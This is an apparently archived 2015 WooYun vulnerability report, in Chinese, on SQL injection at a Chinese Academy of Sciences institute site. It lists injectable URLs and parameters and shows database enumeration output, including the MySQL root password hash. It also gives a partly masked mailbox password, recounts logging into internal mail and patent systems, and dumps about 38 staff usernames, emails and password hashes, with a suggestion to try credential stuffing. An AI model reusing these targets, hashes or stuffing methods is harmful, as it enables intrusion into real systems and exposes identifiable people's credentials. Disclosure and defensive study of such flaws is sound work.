当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131160

漏洞标题:中国科学院某站SQL注入导致众多内部邮箱沦陷(涉及内部专利信息)

相关厂商:中国科学院

漏洞作者: M4sk

提交时间:2015-08-03 09:29

修复时间:2015-09-17 10:06

公开时间:2015-09-17 10:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(中国科技网)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

RT

详细说明:

存在sql注入漏洞的一堆 我丢点出来证明下
http://vcc.siat.ac.cn/index/info?title_id=455
http://vcc.siat.ac.cn/index/getInfo?title_id=455
http://vcc.siat.ac.cn/index/info?lan=true&to_path=research&title_id=453
http://vcc.siat.ac.cn/index/info?to_path=research&title_id=453
http://vcc.siat.ac.cn/index/videoList?title_id=453
http://vcc.siat.ac.cn/index/album?title_id=451
http://vcc.siat.ac.cn/index/member?title_id=452&sub_title=460
http://vcc.siat.ac.cn/index/photo?title_id=451&sub_title=459&album_id=102
等等//.....太多 先列举这么多了..

4.png


root权限的

Target: 		http://vcc.siat.ac.cn/index/info?title_id=457
Host IP: 210.75.252.101
Web Server: Apache-Coyote/1.1
DB Server: MySQL >=5
Resp. Time(avg): 271 ms
Current User: [email protected]
Sql Version: 5.1.65-log
Current DB: zky
System User: [email protected]
Host Name: vcc
Installation dir: /usr/local/mysql-5.1/
DB User & Pass: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:localhost
root::vcc
root::127.0.0.1
::localhost
::vcc
root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:%
Data Bases: information_schema
mysql
test
zky


然后注入出 邮箱密码//... [email protected] sanmu198XXXXXX (XXX代表打码的)

1.png


然后果断登陆之:https://mail.cstnet.cn 和 http://mailax1.cstnet.cn/

2.png


里面还有各种专利信息

11.png


当然在里面还泄露了一些内部的邮箱密码

5.png


敏感信息没去特意找了 有时候邮箱沦陷比网站沦陷了危害还大...
通过一些邮件的密码泄露 我还登陆了一些专利提交的后台

5.png


通过注入又泄露了一堆用户名和密码:

PWD	                                USER_NAME	EMAIL
054057143793510E14D3AECD9499C4FA yanglingxiao [email protected]
0E034DBFC60ADE7CEB5EE4C0306AE12C wangyunhai [email protected]
1CE3C9E5567A28E25554B7F01F2720F7 liwenchao [email protected]
21218CCA77804D2BA1922C33E0151105 administrator [email protected]
21218CCA77804D2BA1922C33E0151105 wobujian [email protected]
21218CCA77804D2BA1922C33E0151105 [email protected] [email protected]
21218CCA77804D2BA1922C33E0151105 [email protected] [email protected]
21218CCA77804D2BA1922C33E0151105 admin
21218CCA77804D2BA1922C33E0151105 cat [email protected]
21218CCA77804D2BA1922C33E0151105 hui [email protected]
25BE52D6CE81E7ED1C7ADA430E9AE3AE renjiacheng [email protected]
25D55AD283AA400AF464C76D713C07AD sunwei [email protected]
2BED64834D3BD81ED7DA2F882D64EDBB huruizhen [email protected]
346B4976FAB39CE840932FFBEA14A45E yinkangxue [email protected]
379E270D1E2B6015C4BC5BC4413405B7 fanxiaochen [email protected]
3BD16E678CBABE745F530681B254C344 zhengqian [email protected]
43731286F0BAEBBBC8BC47E5DACA7F6D yangbingjie [email protected]
4A4666027C104D44C93EB635474C3837 malin [email protected]
4D74CD66A294CF02B8593631BA24583F xieke [email protected]
581F90E97743A591096A020FFEFA089B xiexiaohua [email protected]
670B14728AD9902AECBA32E22FA4F6BD huo [email protected]
81683615F6C0CFB18D4D2DABA81ECC0C wangbin [email protected]
839672FADA5B6F04655ECAAEFECD3900 shixun [email protected]
96E79218965EB72C92A549DD5A330112 rinda [email protected]
96E79218965EB72C92A549DD5A330112 zhouyang [email protected]
A8D3F684A6AAB45308185B4A3B22CA70 wushihao [email protected]
B1E0573D4C5102218879E97F10367515 liujiehong [email protected]
BE78F8FBBEB71B1125D0A4A804A3196B longpinxin [email protected]
BF29B59404CD0A42793926135F824C4F cat [email protected]
CE8B0A8DB47B0E3F3DCD282CCF095FFE shenjiangtao [email protected]
CF93256401811AF7FD3D8A3E8BBECDC4 zoomin [email protected]
DB757B11D472FF5EB85432F65AB12942 zhangwei [email protected]
E10ADC3949BA59ABBE56E057F20F883E renna [email protected]
E10ADC3949BA59ABBE56E057F20F883E [email protected] [email protected]
E161CBEA3489112C71EDEFA7140C7497 xukai [email protected]
E7E1BE2AE59804B0AA8F1316DDDB3597 linwenzhen [email protected]
F0D70EC6D96D21AE69B797922678D908 panguangfan [email protected]
FA03318AD9AEAEDAAC4CC232B95DCA7C wulonghua [email protected]


当然我们看到邮箱了 可以通过会员密码去撞库内部邮箱的密码~
然而我通过这些信息又成功进入了后台

6.png


泄露各种人的信息
不深入了~~

漏洞证明:

综上

修复方案:

各种改密码 修注入

版权声明:转载请注明来源 M4sk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-03 10:05

厂商回复:

收到

最新状态:

暂无